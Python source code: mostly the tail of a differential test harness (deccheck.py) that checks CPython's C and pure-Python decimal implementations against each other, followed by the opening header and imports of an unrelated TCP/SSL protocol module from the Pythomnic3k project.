return self.c.prec
def setprec(self, val):
self.c.prec = val
self.p.prec = val
def getemin(self):
assert(self.c.Emin == self.p.Emin)
return self.c.Emin
def setemin(self, val):
self.c.Emin = val
self.p.Emin = val
def getemax(self):
assert(self.c.Emax == self.p.Emax)
return self.c.Emax
def setemax(self, val):
self.c.Emax = val
self.p.Emax = val
def getround(self):
assert(self.c.rounding == self.p.rounding)
return self.c.rounding
def setround(self, val):
self.c.rounding = val
self.p.rounding = val
def getcapitals(self):
assert(self.c.capitals == self.p.capitals)
return self.c.capitals
def setcapitals(self, val):
self.c.capitals = val
self.p.capitals = val
def getclamp(self):
assert(self.c.clamp == self.p.clamp)
return self.c.clamp
def setclamp(self, val):
self.c.clamp = val
self.p.clamp = val
prec = property(getprec, setprec)
Emin = property(getemin, setemin)
Emax = property(getemax, setemax)
rounding = property(getround, setround)
clamp = property(getclamp, setclamp)
capitals = property(getcapitals, setcapitals)
def clear_traps(self):
self.c.clear_traps()
for trap in self.p.traps:
self.p.traps[trap] = False
def clear_status(self):
self.c.clear_flags()
self.p.clear_flags()
def settraps(self, lst):
"""lst: C signal list"""
self.clear_traps()
for signal in lst:
self.c.traps[signal] = True
self.p.traps[CondMap[signal]] = True
def setstatus(self, lst):
"""lst: C signal list"""
self.clear_status()
for signal in lst:
self.c.flags[signal] = True
self.p.flags[CondMap[signal]] = True
def assert_eq_status(self):
"""assert equality of C and P status"""
for signal in self.c.flags:
if self.c.flags[signal] == (not self.p.flags[CondMap[signal]]):
return False
return True
# We don't want exceptions so that we can compare the status flags.
context = Context()
context.Emin = C.MIN_EMIN
context.Emax = C.MAX_EMAX
context.clear_traps()
# When creating decimals, _decimal is ultimately limited by the maximum
# context values. We emulate this restriction for decimal.py.
maxcontext = P.Context(
prec=C.MAX_PREC,
Emin=C.MIN_EMIN,
Emax=C.MAX_EMAX,
rounding=P.ROUND_HALF_UP,
capitals=1
)
maxcontext.clamp = 0
def RestrictedDecimal(value):
maxcontext.traps = copy(context.p.traps)
maxcontext.clear_flags()
if isinstance(value, str):
value = value.strip()
dec = maxcontext.create_decimal(value)
if maxcontext.flags[P.Inexact] or \
maxcontext.flags[P.Rounded] or \
maxcontext.flags[P.Clamped] or \
maxcontext.flags[P.InvalidOperation]:
return context.p._raise_error(P.InvalidOperation)
if maxcontext.flags[P.FloatOperation]:
context.p.flags[P.FloatOperation] = True
return dec
# ======================================================================
# TestSet: Organize data and events during a single test case
# ======================================================================
class RestrictedList(list):
"""List that can only be modified by appending items."""
def __getattribute__(self, name):
if name != 'append':
raise AttributeError("unsupported operation")
return list.__getattribute__(self, name)
def unsupported(self, *_):
raise AttributeError("unsupported operation")
__add__ = __delattr__ = __delitem__ = __iadd__ = __imul__ = unsupported
__mul__ = __reversed__ = __rmul__ = __setattr__ = __setitem__ = unsupported
class TestSet(object):
"""A TestSet contains the original input operands, converted operands,
Python exceptions that occurred either during conversion or during
execution of the actual function, and the final results.
For safety, most attributes are lists that only support the append
operation.
If a function name is prefixed with 'context.', the corresponding
context method is called.
"""
def __init__(self, funcname, operands):
if funcname.startswith("context."):
self.funcname = funcname.replace("context.", "")
self.contextfunc = True
else:
self.funcname = funcname
self.contextfunc = False
self.op = operands # raw operand tuple
self.context = context # context used for the operation
self.cop = RestrictedList() # converted C.Decimal operands
self.cex = RestrictedList() # Python exceptions for C.Decimal
self.cresults = RestrictedList() # C.Decimal results
self.pop = RestrictedList() # converted P.Decimal operands
self.pex = RestrictedList() # Python exceptions for P.Decimal
self.presults = RestrictedList() # P.Decimal results
# If the above results are exact, unrounded and not clamped, repeat
# the operation with a maxcontext to ensure that huge intermediate
# values do not cause a MemoryError.
self.with_maxcontext = False
self.maxcontext = context.c.copy()
self.maxcontext.prec = C.MAX_PREC
self.maxcontext.Emax = C.MAX_EMAX
self.maxcontext.Emin = C.MIN_EMIN
self.maxcontext.clear_flags()
self.maxop = RestrictedList() # converted C.Decimal operands
self.maxex = RestrictedList() # Python exceptions for C.Decimal
self.maxresults = RestrictedList() # C.Decimal results
# ======================================================================
# SkipHandler: skip known discrepancies
# ======================================================================
class SkipHandler:
"""Handle known discrepancies between decimal.py and _decimal.so.
These are either ULP differences in the power function or
extremely minor issues."""
def __init__(self):
self.ulpdiff = 0
self.powmod_zeros = 0
self.maxctx = P.Context(Emax=10**18, Emin=-10**18)
def default(self, t):
return False
__ge__ = __gt__ = __le__ = __lt__ = __ne__ = __eq__ = default
__reduce__ = __format__ = __repr__ = __str__ = default
def harrison_ulp(self, dec):
"""ftp://ftp.inria.fr/INRIA/publication/publi-pdf/RR/RR-5504.pdf"""
a = dec.next_plus()
b = dec.next_minus()
return abs(a - b)
def standard_ulp(self, dec, prec):
return _dec_from_triple(0, '1', dec._exp+len(dec._int)-prec)
def rounding_direction(self, x, mode):
"""Determine the effective direction of the rounding when
the exact result x is rounded according to mode.
Return -1 for downwards, 0 for undirected, 1 for upwards,
2 for ROUND_05UP."""
cmp = 1 if x.compare_total(P.Decimal("+0")) >= 0 else -1
if mode in (P.ROUND_HALF_EVEN, P.ROUND_HALF_UP, P.ROUND_HALF_DOWN):
return 0
elif mode == P.ROUND_CEILING:
return 1
elif mode == P.ROUND_FLOOR:
return -1
elif mode == P.ROUND_UP:
return cmp
elif mode == P.ROUND_DOWN:
return -cmp
elif mode == P.ROUND_05UP:
return 2
else:
raise ValueError("Unexpected rounding mode: %s" % mode)
def check_ulpdiff(self, exact, rounded):
# current precision
p = context.p.prec
# Convert infinities to the largest representable number + 1.
x = exact
if exact.is_infinite():
x = _dec_from_triple(exact._sign, '10', context.p.Emax)
y = rounded
if rounded.is_infinite():
y = _dec_from_triple(rounded._sign, '10', context.p.Emax)
# err = (rounded - exact) / ulp(rounded)
self.maxctx.prec = p * 2
t = self.maxctx.subtract(y, x)
if context.c.flags[C.Clamped] or \
context.c.flags[C.Underflow]:
# The standard ulp does not work in Underflow territory.
ulp = self.harrison_ulp(y)
else:
ulp = self.standard_ulp(y, p)
# Error in ulps.
err = self.maxctx.divide(t, ulp)
dir = self.rounding_direction(x, context.p.rounding)
if dir == 0:
if P.Decimal("-0.6") < err < P.Decimal("0.6"):
return True
elif dir == 1: # directed, upwards
if P.Decimal("-0.1") < err < P.Decimal("1.1"):
return True
elif dir == -1: # directed, downwards
if P.Decimal("-1.1") < err < P.Decimal("0.1"):
return True
else: # ROUND_05UP
if P.Decimal("-1.1") < err < P.Decimal("1.1"):
return True
print("ulp: %s error: %s exact: %s c_rounded: %s"
% (ulp, err, exact, rounded))
return False
def bin_resolve_ulp(self, t):
"""Check if results of _decimal's power function are within the
allowed ulp ranges."""
# NaNs are beyond repair.
if t.rc.is_nan() or t.rp.is_nan():
return False
# "exact" result, double precision, half_even
self.maxctx.prec = context.p.prec * 2
op1, op2 = t.pop[0], t.pop[1]
if t.contextfunc:
exact = getattr(self.maxctx, t.funcname)(op1, op2)
else:
exact = getattr(op1, t.funcname)(op2, context=self.maxctx)
# _decimal's rounded result
rounded = P.Decimal(t.cresults[0])
self.ulpdiff += 1
return self.check_ulpdiff(exact, rounded)
############################ Correct rounding #############################
def resolve_underflow(self, t):
"""In extremely rare cases where the infinite precision result is just
below etiny, cdecimal does not set Subnormal/Underflow. Example:
setcontext(Context(prec=21, rounding=ROUND_UP, Emin=-55, Emax=85))
Decimal("1.00000000000000000000000000000000000000000000000"
"0000000100000000000000000000000000000000000000000"
"0000000000000025").ln()
"""
if t.cresults != t.presults:
return False # Results must be identical.
if context.c.flags[C.Rounded] and \
context.c.flags[C.Inexact] and \
context.p.flags[P.Rounded] and \
context.p.flags[P.Inexact]:
return True # Subnormal/Underflow may be missing.
return False
def exp(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def log10(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def ln(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def __pow__(self, t):
"""Always calls the resolve function. C.Decimal does not have correct
rounding for the power function."""
if context.c.flags[C.Rounded] and \
context.c.flags[C.Inexact] and \
context.p.flags[P.Rounded] and \
context.p.flags[P.Inexact]:
return self.bin_resolve_ulp(t)
else:
return False
power = __rpow__ = __pow__
############################## Technicalities #############################
def __float__(self, t):
"""NaN comparison in the verify() function obviously gives an
incorrect answer: nan == nan -> False"""
if t.cop[0].is_nan() and t.pop[0].is_nan():
return True
return False
__complex__ = __float__
def __radd__(self, t):
"""decimal.py gives precedence to the first NaN; this is
not important, as __radd__ will not be called for
two decimal arguments."""
if t.rc.is_nan() and t.rp.is_nan():
return True
return False
__rmul__ = __radd__
################################ Various ##################################
def __round__(self, t):
"""Exception: Decimal('1').__round__(-100000000000000000000000000)
Should it really be InvalidOperation?"""
if t.rc is None and t.rp.is_nan():
return True
return False
shandler = SkipHandler()
def skip_error(t):
return getattr(shandler, t.funcname, shandler.default)(t)
# ======================================================================
# Handling verification errors
# ======================================================================
class VerifyError(Exception):
"""Verification failed."""
pass
def function_as_string(t):
if t.contextfunc:
cargs = t.cop
pargs = t.pop
maxargs = t.maxop
cfunc = "c_func: %s(" % t.funcname
pfunc = "p_func: %s(" % t.funcname
maxfunc = "max_func: %s(" % t.funcname
else:
cself, cargs = t.cop[0], t.cop[1:]
pself, pargs = t.pop[0], t.pop[1:]
maxself, maxargs = t.maxop[0], t.maxop[1:]
cfunc = "c_func: %s.%s(" % (repr(cself), t.funcname)
pfunc = "p_func: %s.%s(" % (repr(pself), t.funcname)
maxfunc = "max_func: %s.%s(" % (repr(maxself), t.funcname)
err = cfunc
for arg in cargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")\n"
err += pfunc
for arg in pargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")"
if t.with_maxcontext:
err += "\n"
err += maxfunc
for arg in maxargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")"
return err
def raise_error(t):
global EXIT_STATUS
if skip_error(t):
return
EXIT_STATUS = 1
err = "Error in %s:\n\n" % t.funcname
err += "input operands: %s\n\n" % (t.op,)
err += function_as_string(t)
err += "\n\nc_result: %s\np_result: %s\n" % (t.cresults, t.presults)
if t.with_maxcontext:
err += "max_result: %s\n\n" % (t.maxresults)
else:
err += "\n"
err += "c_exceptions: %s\np_exceptions: %s\n" % (t.cex, t.pex)
if t.with_maxcontext:
err += "max_exceptions: %s\n\n" % t.maxex
else:
err += "\n"
err += "%s\n" % str(t.context)
if t.with_maxcontext:
err += "%s\n" % str(t.maxcontext)
else:
err += "\n"
raise VerifyError(err)
# ======================================================================
# Main testing functions
#
# The procedure is always (t is the TestSet):
#
# convert(t) -> Initialize the TestSet as necessary.
#
# Return 0 for early abortion (e.g. if a TypeError
# occurs during conversion, there is nothing to test).
#
# Return 1 for continuing with the test case.
#
# callfuncs(t) -> Call the relevant function for each implementation
# and record the results in the TestSet.
#
# verify(t) -> Verify the results. If verification fails, details
# are printed to stdout.
# ======================================================================
def all_nan(a):
if isinstance(a, C.Decimal):
return a.is_nan()
elif isinstance(a, tuple):
return all(all_nan(v) for v in a)
return False
def convert(t, convstr=True):
""" t is the testset. At this stage the testset contains a tuple of
operands t.op of various types. For decimal methods the first
operand (self) is always converted to Decimal. If 'convstr' is
true, string operands are converted as well.
Context operands are of type deccheck.Context, rounding mode
operands are given as a tuple (C.rounding, P.rounding).
Other types (float, int, etc.) are left unchanged.
"""
for i, op in enumerate(t.op):
context.clear_status()
t.maxcontext.clear_flags()
if op in RoundModes:
t.cop.append(op)
t.pop.append(op)
t.maxop.append(op)
elif not t.contextfunc and i == 0 or \
convstr and isinstance(op, str):
try:
c = C.Decimal(op)
cex = None
except (TypeError, ValueError, OverflowError) as e:
c = None
cex = e.__class__
try:
p = RestrictedDecimal(op)
pex = None
except (TypeError, ValueError, OverflowError) as e:
p = None
pex = e.__class__
try:
C.setcontext(t.maxcontext)
maxop = C.Decimal(op)
maxex = None
except (TypeError, ValueError, OverflowError) as e:
maxop = None
maxex = e.__class__
finally:
C.setcontext(context.c)
t.cop.append(c)
t.cex.append(cex)
t.pop.append(p)
t.pex.append(pex)
t.maxop.append(maxop)
t.maxex.append(maxex)
if cex is pex:
if str(c) != str(p) or not context.assert_eq_status():
raise_error(t)
if cex and pex:
# nothing to test
return 0
else:
raise_error(t)
# The exceptions in the maxcontext operation can legitimately
# differ, only test that maxex implies cex:
if maxex is not None and cex is not maxex:
raise_error(t)
elif isinstance(op, Context):
t.context = op
t.cop.append(op.c)
t.pop.append(op.p)
t.maxop.append(t.maxcontext)
else:
t.cop.append(op)
t.pop.append(op)
t.maxop.append(op)
return 1
def callfuncs(t):
""" t is the testset. At this stage the testset contains operand lists
t.cop and t.pop for the C and Python versions of decimal.
For Decimal methods, the first operands are of type C.Decimal and
P.Decimal respectively. The remaining operands can have various types.
For Context methods, all operands can have any type.
t.rc and t.rp are the results of the operation.
"""
context.clear_status()
t.maxcontext.clear_flags()
try:
if t.contextfunc:
cargs = t.cop
t.rc = getattr(context.c, t.funcname)(*cargs)
else:
cself = t.cop[0]
cargs = t.cop[1:]
t.rc = getattr(cself, t.funcname)(*cargs)
t.cex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rc = None
t.cex.append(e.__class__)
try:
if t.contextfunc:
pargs = t.pop
t.rp = getattr(context.p, t.funcname)(*pargs)
else:
pself = t.pop[0]
pargs = t.pop[1:]
t.rp = getattr(pself, t.funcname)(*pargs)
t.pex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rp = None
t.pex.append(e.__class__)
# If the above results are exact, unrounded, normal etc., repeat the
# operation with a maxcontext to ensure that huge intermediate values
# do not cause a MemoryError.
if (t.funcname not in MaxContextSkip and
not context.c.flags[C.InvalidOperation] and
not context.c.flags[C.Inexact] and
not context.c.flags[C.Rounded] and
not context.c.flags[C.Subnormal] and
not context.c.flags[C.Clamped] and
not context.clamp and # results are padded to context.prec if context.clamp==1.
not any(isinstance(v, C.Context) for v in t.cop)): # another context is used.
t.with_maxcontext = True
try:
if t.contextfunc:
maxargs = t.maxop
t.rmax = getattr(t.maxcontext, t.funcname)(*maxargs)
else:
maxself = t.maxop[0]
maxargs = t.maxop[1:]
try:
C.setcontext(t.maxcontext)
t.rmax = getattr(maxself, t.funcname)(*maxargs)
finally:
C.setcontext(context.c)
t.maxex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rmax = None
t.maxex.append(e.__class__)
def verify(t, stat):
""" t is the testset. At this stage the testset contains the following
tuples:
t.op: original operands
t.cop: C.Decimal operands (see convert for details)
t.pop: P.Decimal operands (see convert for details)
t.rc: C result
t.rp: Python result
t.rc and t.rp can have various types.
"""
t.cresults.append(str(t.rc))
t.presults.append(str(t.rp))
if t.with_maxcontext:
t.maxresults.append(str(t.rmax))
if isinstance(t.rc, C.Decimal) and isinstance(t.rp, P.Decimal):
# General case: both results are Decimals.
t.cresults.append(t.rc.to_eng_string())
t.cresults.append(t.rc.as_tuple())
t.cresults.append(str(t.rc.imag))
t.cresults.append(str(t.rc.real))
t.presults.append(t.rp.to_eng_string())
t.presults.append(t.rp.as_tuple())
t.presults.append(str(t.rp.imag))
t.presults.append(str(t.rp.real))
ctriple = None
if t.funcname not in ['__radd__', '__rmul__']: # see skip handler
try:
ctriple = c_as_triple(t.rc)
except ValueError:
try:
ptriple = p_as_triple(t.rp)
except ValueError:
pass
else:
raise RuntimeError("ValueError not raised")
else:
cres = c_from_triple(ctriple)
t.cresults.append(ctriple)
t.cresults.append(str(cres))
ptriple = p_as_triple(t.rp)
pres = p_from_triple(ptriple)
t.presults.append(ptriple)
t.presults.append(str(pres))
if t.with_maxcontext and isinstance(t.rmax, C.Decimal):
t.maxresults.append(t.rmax.to_eng_string())
t.maxresults.append(t.rmax.as_tuple())
t.maxresults.append(str(t.rmax.imag))
t.maxresults.append(str(t.rmax.real))
if ctriple is not None:
# NaN payloads etc. depend on precision and clamp.
if all_nan(t.rc) and all_nan(t.rmax):
t.maxresults.append(ctriple)
t.maxresults.append(str(cres))
else:
maxtriple = c_as_triple(t.rmax)
maxres = c_from_triple(maxtriple)
t.maxresults.append(maxtriple)
t.maxresults.append(str(maxres))
nc = t.rc.number_class().lstrip('+-s')
stat[nc] += 1
else:
# Results from e.g. __divmod__ can only be compared as strings.
if not isinstance(t.rc, tuple) and not isinstance(t.rp, tuple):
if t.rc != t.rp:
raise_error(t)
if t.with_maxcontext and not isinstance(t.rmax, tuple):
if t.rmax != t.rc:
raise_error(t)
stat[type(t.rc).__name__] += 1
# The return value lists must be equal.
if t.cresults != t.presults:
raise_error(t)
# The Python exception lists (TypeError, etc.) must be equal.
if t.cex != t.pex:
raise_error(t)
# The context flags must be equal.
if not t.context.assert_eq_status():
raise_error(t)
if t.with_maxcontext:
# NaN payloads etc. depend on precision and clamp.
if all_nan(t.rc) and all_nan(t.rmax):
return
# The return value lists must be equal.
if t.maxresults != t.cresults:
raise_error(t)
# The Python exception lists (TypeError, etc.) must be equal.
if t.maxex != t.cex:
raise_error(t)
# The context flags must be equal.
if t.maxcontext.flags != t.context.c.flags:
raise_error(t)
# ======================================================================
# Main test loops
#
# test_method(method, testspecs, testfunc) ->
#
# Loop through various context settings. The degree of
# thoroughness is determined by 'testspec'. For each
# setting, call 'testfunc'. Generally, 'testfunc' itself
# a loop, iterating through many test cases generated
# by the functions in randdec.py.
#
# test_n-ary(method, prec, exp_range, restricted_range, itr, stat) ->
#
# 'test_unary', 'test_binary' and 'test_ternary' are the
# main test functions passed to 'test_method'. They deal
# with the regular cases. The thoroughness of testing is
# determined by 'itr'.
#
# 'prec', 'exp_range' and 'restricted_range' are passed
# to the test-generating functions and limit the generated
# values. In some cases, for reasonable run times a
# maximum exponent of 9999 is required.
#
# The 'stat' parameter is passed down to the 'verify'
# function, which records statistics for the result values.
# ======================================================================
def log(fmt, args=None):
if args:
sys.stdout.write(''.join((fmt, '\n')) % args)
else:
sys.stdout.write(''.join((str(fmt), '\n')))
sys.stdout.flush()
def test_method(method, testspecs, testfunc):
"""Iterate a test function through many context settings."""
log("testing %s ...", method)
stat = defaultdict(int)
for spec in testspecs:
if 'samples' in spec:
spec['prec'] = sorted(random.sample(range(1, 101),
spec['samples']))
for prec in spec['prec']:
context.prec = prec
for expts in spec['expts']:
emin, emax = expts
if emin == 'rand':
context.Emin = random.randrange(-1000, 0)
context.Emax = random.randrange(prec, 1000)
else:
context.Emin, context.Emax = emin, emax
if prec > context.Emax: continue
log(" prec: %d emin: %d emax: %d",
(context.prec, context.Emin, context.Emax))
restr_range = 9999 if context.Emax > 9999 else context.Emax+99
for rounding in RoundModes:
context.rounding = rounding
context.capitals = random.randrange(2)
if spec['clamp'] == 'rand':
context.clamp = random.randrange(2)
else:
context.clamp = spec['clamp']
exprange = context.c.Emax
testfunc(method, prec, exprange, restr_range,
spec['iter'], stat)
log(" result types: %s" % sorted([t for t in stat.items()]))
def test_unary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a unary function through many test cases."""
if method in UnaryRestricted:
exp_range = restricted_range
for op in all_unary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in unary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_binary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a binary function through many test cases."""
if method in BinaryRestricted:
exp_range = restricted_range
for op in all_binary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in binary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_ternary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a ternary function through many test cases."""
if method in TernaryRestricted:
exp_range = restricted_range
for op in all_ternary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in ternary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_format(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate the __format__ method through many test cases."""
for op in all_unary(prec, exp_range, itr):
fmt1 = rand_format(chr(random.randrange(0, 128)), 'EeGgn')
fmt2 = rand_locale()
for fmt in (fmt1, fmt2):
fmtop = (op[0], fmt)
t = TestSet(method, fmtop)
try:
if not convert(t, convstr=False):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
for op in all_unary(prec, 9999, itr):
fmt1 = rand_format(chr(random.randrange(0, 128)), 'Ff%')
fmt2 = rand_locale()
for fmt in (fmt1, fmt2):
fmtop = (op[0], fmt)
t = TestSet(method, fmtop)
try:
if not convert(t, convstr=False):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_round(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the __round__ method through many test cases."""
for op in all_unary(prec, 9999, itr):
n = random.randrange(10)
roundop = (op[0], n)
t = TestSet(method, roundop)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_from_float(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the __float__ method through many test cases."""
for rounding in RoundModes:
context.rounding = rounding
for i in range(1000):
f = randfloat()
op = (f,) if method.startswith("context.") else ("sNaN", f)
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def randcontext(exprange):
c = Context(C.Context(), P.Context())
c.Emax = random.randrange(1, exprange+1)
c.Emin = random.randrange(-exprange, 0)
maxprec = 100 if c.Emax >= 100 else c.Emax
c.prec = random.randrange(1, maxprec+1)
c.clamp = random.randrange(2)
c.clear_traps()
return c
def test_quantize_api(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the 'quantize' method through many test cases, using
the optional arguments."""
for op in all_binary(prec, restricted_range, itr):
for rounding in RoundModes:
c = randcontext(exprange)
quantizeop = (op[0], op[1], rounding, c)
t = TestSet(method, quantizeop)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def check_untested(funcdict, c_cls, p_cls):
"""Determine untested, C-only and Python-only attributes.
Uncomment print lines for debugging."""
c_attr = set(dir(c_cls))
p_attr = set(dir(p_cls))
intersect = c_attr & p_attr
funcdict['c_only'] = tuple(sorted(c_attr-intersect))
funcdict['p_only'] = tuple(sorted(p_attr-intersect))
tested = set()
for lst in funcdict.values():
for v in lst:
v = v.replace("context.", "") if c_cls == C.Context else v
tested.add(v)
funcdict['untested'] = tuple(sorted(intersect-tested))
# for key in ('untested', 'c_only', 'p_only'):
# s = 'Context' if c_cls == C.Context else 'Decimal'
# print("\n%s %s:\n%s" % (s, key, funcdict[key]))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog="deccheck.py")
group = parser.add_mutually_exclusive_group()
group.add_argument('--short', dest='time', action="store_const", const='short', default='short', help="short test (default)")
group.add_argument('--medium', dest='time', action="store_const", const='medium', default='short', help="medium test (reasonable run time)")
group.add_argument('--long', dest='time', action="store_const", const='long', default='short', help="long test (long run time)")
group.add_argument('--all', dest='time', action="store_const", const='all', default='short', help="all tests (excessive run time)")
group = parser.add_mutually_exclusive_group()
group.add_argument('--single', dest='single', nargs=1, default=False, metavar="TEST", help="run a single test")
group.add_argument('--multicore', dest='multicore', action="store_true", default=False, help="use all available cores")
args = parser.parse_args()
assert args.single is False or args.multicore is False
if args.single:
args.single = args.single[0]
# Set up the testspecs list. A testspec is simply a dictionary
# that determines the amount of different contexts that 'test_method'
# will generate.
base_expts = [(C.MIN_EMIN, C.MAX_EMAX)]
if C.MAX_EMAX == 999999999999999999:
base_expts.append((-999999999, 999999999))
# Basic contexts.
base = {
'expts': base_expts,
'prec': [],
'clamp': 'rand',
'iter': None,
'samples': None,
}
# Contexts with small values for prec, emin, emax.
small = {
'prec': [1, 2, 3, 4, 5],
'expts': [(-1, 1), (-2, 2), (-3, 3), (-4, 4), (-5, 5)],
'clamp': 'rand',
'iter': None
}
# IEEE interchange format.
ieee = [
# DECIMAL32
{'prec': [7], 'expts': [(-95, 96)], 'clamp': 1, 'iter': None},
# DECIMAL64
{'prec': [16], 'expts': [(-383, 384)], 'clamp': 1, 'iter': None},
# DECIMAL128
{'prec': [34], 'expts': [(-6143, 6144)], 'clamp': 1, 'iter': None}
]
if args.time == 'medium':
base['expts'].append(('rand', 'rand'))
# 5 random precisions
base['samples'] = 5
testspecs = [small] + ieee + [base]
elif args.time == 'long':
base['expts'].append(('rand', 'rand'))
# 10 random precisions
base['samples'] = 10
testspecs = [small] + ieee + [base]
elif args.time == 'all':
base['expts'].append(('rand', 'rand'))
# All precisions in [1, 100]
base['samples'] = 100
testspecs = [small] + ieee + [base]
else: # --short
rand_ieee = random.choice(ieee)
base['iter'] = small['iter'] = rand_ieee['iter'] = 1
# 1 random precision and exponent pair
base['samples'] = 1
base['expts'] = [random.choice(base_expts)]
# 1 random precision and exponent pair
prec = random.randrange(1, 6)
small['prec'] = [prec]
small['expts'] = [(-prec, prec)]
testspecs = [small, rand_ieee, base]
check_untested(Functions, C.Decimal, P.Decimal)
check_untested(ContextFunctions, C.Context, P.Context)
if args.multicore:
q = Queue()
elif args.single:
log("Random seed: %d", RANDSEED)
else:
log("\n\nRandom seed: %d\n\n", RANDSEED)
FOUND_METHOD = False
def do_single(method, f):
global FOUND_METHOD
if args.multicore:
q.put(method)
elif not args.single or args.single == method:
FOUND_METHOD = True
f()
# Decimal methods:
for method in Functions['unary'] + Functions['unary_ctx'] + \
Functions['unary_rnd_ctx']:
do_single(method, lambda: test_method(method, testspecs, test_unary))
for method in Functions['binary'] + Functions['binary_ctx']:
do_single(method, lambda: test_method(method, testspecs, test_binary))
for method in Functions['ternary'] + Functions['ternary_ctx']:
name = '__powmod__' if method == '__pow__' else method
do_single(name, lambda: test_method(method, testspecs, test_ternary))
do_single('__format__', lambda: test_method('__format__', testspecs, test_format))
do_single('__round__', lambda: test_method('__round__', testspecs, test_round))
do_single('from_float', lambda: test_method('from_float', testspecs, test_from_float))
do_single('quantize_api', lambda: test_method('quantize', testspecs, test_quantize_api))
# Context methods:
for method in ContextFunctions['unary']:
do_single(method, lambda: test_method(method, testspecs, test_unary))
for method in ContextFunctions['binary']:
do_single(method, lambda: test_method(method, testspecs, test_binary))
for method in ContextFunctions['ternary']:
name = 'context.powmod' if method == 'context.power' else method
do_single(name, lambda: test_method(method, testspecs, test_ternary))
do_single('context.create_decimal_from_float',
lambda: test_method('context.create_decimal_from_float',
testspecs, test_from_float))
if args.multicore:
error = Event()
write_lock = Lock()
def write_output(out, returncode):
if returncode != 0:
error.set()
with write_lock:
sys.stdout.buffer.write(out + b"\n")
sys.stdout.buffer.flush()
def tfunc():
while not error.is_set():
try:
test = q.get(block=False, timeout=-1)
except Empty:
return
cmd = [sys.executable, "deccheck.py", "--%s" % args.time, "--single", test]
p = subprocess.Popen(cmd, stdout=PIPE, stderr=STDOUT)
out, _ = p.communicate()
write_output(out, p.returncode)
N = os.cpu_count()
t = N * [None]
for i in range(N):
t[i] = Thread(target=tfunc)
t[i].start()
for i in range(N):
t[i].join()
sys.exit(1 if error.is_set() else 0)
elif args.single:
if not FOUND_METHOD:
log("\nerror: cannot find method \"%s\"" % args.single)
EXIT_STATUS = 1
sys.exit(EXIT_STATUS)
else:
sys.exit(EXIT_STATUS)
|
protocol_tcp.py
|
#!/usr/bin/env python3
#-*- coding: iso-8859-1 -*-
################################################################################
#
# This module contains an implementation of a generic TCP-based request-response
# interface, it is used internally as a base for the specific application-level
# protocol interfaces, such as HTTP, and should not therefore be used directly,
# but through protocol-specific descendants, such as protocol_http.py.
#
# The module also contains a generic "resource" for sending/receiving data
# over TCP. Because it respects the request timeout and does not block, it is
# used in many other TCP-based resources as a low level send/receive facility.
#
# Both interface and resource support SSL as well as plain TCP.
#
# Pythomnic3k project
# (c) 2005-2019, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
###############################################################################
__all__ = [ "TcpInterface", "TcpResource" ]
###############################################################################
import threading; from threading import Event, Lock, current_thread
import select; from select import select, error as select_error
import socket; from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, \
SOL_SOCKET, SO_REUSEADDR, error as socket_error
import io; from io import BytesIO
import os; from os import SEEK_CUR, path as os_path
import ssl; from ssl import wrap_socket, CERT_OPTIONAL, CERT_REQUIRED, CERT_NONE, \
SSLError, SSL_ERROR_WANT_WRITE, SSL_ERROR_WANT_READ, \
SSLContext, PROTOCOL_SSLv23, OP_NO_SSLv2, OP_NO_SSLv3
import random; from random import shuffle
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..", "..", "lib")))
import exc_string; from exc_string import exc_string
import typecheck; from typecheck import typecheck, callable, optional, one_of
import interlocked_queue; from interlocked_queue import InterlockedQueue
import pmnc.timeout; from pmnc.timeout import Timeout
import pmnc.threads; from pmnc.threads import HeavyThread
import pmnc.request; from pmnc.request import Request
###############################################################################
# this utility function returns a description
# of a connection for a given socket
def _cf(socket): # connection from
try:
return "connection from {0[0]:s}:{0[1]:d}".\
format(socket.getpeername())
except:
return "aborted connection" # should not throw
###############################################################################
# this utility function extracts common name
